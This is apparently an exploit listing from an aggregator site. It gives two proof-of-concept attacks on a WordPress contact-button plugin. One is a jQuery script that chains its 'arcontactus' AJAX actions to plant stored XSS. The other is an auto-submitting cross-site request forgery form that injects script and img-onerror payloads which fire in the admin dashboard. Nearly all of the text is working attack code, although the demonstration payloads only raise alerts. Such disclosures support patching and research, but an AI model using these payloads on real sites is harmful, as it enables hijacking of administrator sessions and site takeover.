Share
## https://sploitus.com/exploit?id=WPEX-ID:10277
v < 1.7.9 (payload from original submitter)

var payload = `alert("xss")`;
jQuery.ajax({
    url: ajaxurl,
    method: 'post',
    data: {
        action: "arcontactus_save_menu_item",
        data: {
            ajax: true,
            id:"",
            title: " ",
            subtitle: `";${payload};var x="`,
            icon: "facebook",
            fa_icon: "",
            color: "FFFFFF",
            display: '1',
            registered_only: false,
            type: 2,
            link: "",
            target: 0,
            content: "",
            integration: "",
            js: "console.log(/hello/)",
            status: true,
            id:""
        }
    },
    success: function(res){
        console.log('Item added, Getting the id now');
        // Get the ID
        jQuery.ajax({
            url: ajaxurl,
            method: 'post',
            data: {
                action: "arcontactus_reload_menu_items",
            },
            success: function(res){
                res = JSON.parse(res);
                content = jQuery.parseHTML(res.content);
                itemId = jQuery(content).find('#the-list span:contains("alert")').first().parent().parent().attr('data-id');
                console.log(`Activating [${itemId}] now`);
                
                jQuery.ajax({
                    url: ajaxurl,
                    method: 'post',
                    data: {
                        action: "arcontactus_switch_menu_item",
                        id: itemId,
                        data: {
                            ajax: true,
                        }
                    },
                    success: function(res){
                        console.log('Success :)');
                    }
                });        
            }
        });
    }
});

v < 1.8.8 (payload from WPScanTeam. XSS will be triggered in admin dashboard, in the settings page of the plugin)

<html>
  <body onload="document.forms[0].submit();">
    <form action="https://[WP]/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="arcontactus_save_menu_item" />
      <input type="hidden" name="ajax" value="true" />
      <input type="hidden" name="data[id]" value="" />
      <input type="hidden" name="data[title]" value="<img src=x onerror=alert(/XSSTitle/)>" />
      <input type="hidden" name="data[subtitle]" value="<script>alert(/XSSSubTitle/)</script>" />
      <input type="hidden" name="data[icon]" value="facebook_messenger" />
      <input type="hidden" name="data[fa_icon]" value="" />
      <input type="hidden" name="data[color]" value="000000" />
      <input type="hidden" name="data[display]" value="1" />
      <input type="hidden" name="data[registered_only]" value="0" />
      <input type="hidden" name="data[type]" value="2" />
      <input type="hidden" name="data[link]" value="" />
      <input type="hidden" name="data[target]" value="0" />
      <input type="hidden" name="data[content]" value="" />
      <input type="hidden" name="data[integration]" value="" />
      <input type="hidden" name="data[js]" value="console.log(/yolo/)" />
      <input type="hidden" name="id" value="" />
    </form>
  </body>
</html>